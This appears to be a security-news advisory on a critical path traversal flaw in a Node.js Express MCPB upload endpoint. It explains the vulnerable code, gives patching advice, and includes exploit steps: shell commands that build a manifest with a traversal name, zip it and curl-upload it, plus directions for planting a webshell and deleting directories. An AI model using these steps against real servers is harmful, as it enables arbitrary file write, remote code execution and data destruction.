Listen to this Post
How the mentioned CVE works:
The MCPB file upload handler accepts ZIP archives with a manifest.json file. The manifest contains a “name” field that the server uses to construct a directory path for extraction. On line 107 of mcpbController.ts, the code concatenates `manifest.name` directly into a path template: `server-${manifest.name}` without any sanitization. An attacker can craft a malicious MCPB file where the name field includes path traversal sequences like ../../../etc/malicious. When the server extracts the ZIP, it calls `fs.mkdirSync` and `fs.renameSync` on the unsanitized path, allowing files to be written to arbitrary locations outside the intended upload directory. The `cleanupOldMcpbServer` function (line 110) also uses the same unsanitized name, potentially deleting arbitrary directories if they match the traversal pattern. The upload endpoint `/mcpb/upload` accepts user-supplied files with only extension and size checks, no content validation. The middleware extracts the ZIP, reads manifest.json, and only verifies that the name field is non-empty. There is no `path.resolve` or `basename` filtering, and no whitelist of allowed characters. This leads to a path traversal vulnerability enabling arbitrary file write and directory deletion. The issue exists in production code, not test or demo contexts.
dailycve form:
Platform: Node.js Express
Version: Unknown
Vulnerability: Path Traversal
Severity: Critical
date: 2026-04-23
Prediction: 2026-05-15
What Undercode Say:
Create malicious manifest.json
echo '{"name":"../../../etc/pwned","manifest_version":"1"}' > manifest.json
Package into MCPB (ZIP)
zip malicious.mcpb manifest.json
Upload using curl
curl -X POST -F "[email protected]" http://target/mcpb/upload
Check traversal write
ls -la /etc/pwned
// Vulnerable code snippet
const finalExtractDir = path.join(path.dirname(mcpbFilePath), <code>server-${manifest.name}</code>);
fs.mkdirSync(finalExtractDir, { recursive: true });
fs.renameSync(tempExtractDir, finalExtractDir);
how Exploit:
- Craft ZIP file with manifest.json containing name: `../../../var/www/html/shell`
2. Include malicious payload file (e.g., webshell.php) in ZIP
3. Upload via /mcpb/upload endpoint
- Server extracts to traversal path, overwriting critical files
- For deletion, use name like `../../../tmp/clean` triggering cleanupOldMcpbServer
Protection from this CVE
- Sanitize manifest.name with `path.basename()` and reject path separators
- Normalize path using `path.resolve(baseDir, safeName)` and verify resolved path starts with baseDir
- Implement whitelist regex: `^[a-zA-Z0-9_.-]+$` for name
- Validate that finalExtractDir stays within upload base directory before fs operations
Impact:
Arbitrary file write to any filesystem location, arbitrary directory deletion, potential remote code execution by overwriting configs or binaries, complete system compromise if writing to startup scripts or cron directories.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

